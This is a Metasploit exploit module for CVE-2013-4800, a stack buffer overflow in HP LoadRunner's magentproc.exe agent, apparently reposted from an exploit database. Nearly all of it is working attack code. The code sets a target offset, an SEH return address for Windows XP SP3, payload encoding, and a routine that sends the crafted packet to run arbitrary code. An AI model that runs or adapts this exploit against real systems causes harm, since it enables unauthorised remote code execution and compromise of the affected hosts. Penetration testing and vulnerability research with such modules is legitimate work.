###########################

# HP LoadRunner magentproc.exe Overflow

###########################

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'HP LoadRunner magentproc.exe Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' =>
[
'Unknown', # Original discovery # From Tenable Network Security
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4800'],
['OSVDB', '95644'],
['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'SSL3',
'PrependMigrate' => true
},
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows XP SP3 / HP LoadRunner 11.50',
{
# magentproc.exe 11.50.2042.0
'Offset' => 1104,
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
'Crash' => 6000 # Length needed to ensure an exception
}
]
],
'DisclosureDate' => 'Jul 27 2013'))

register_options([Opt::RPORT(443)], self.class)
end

def exploit

req = [0xffffffff].pack("N") # Fake Length
req << rand_text(target['Offset'])
req << generate_seh_record(target.ret)
req << payload.encoded
req << rand_text(target['Crash'])

connect
print_status("Sending malicious request...")
sock.put(req)
disconnect

end
end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-10-08]

###########################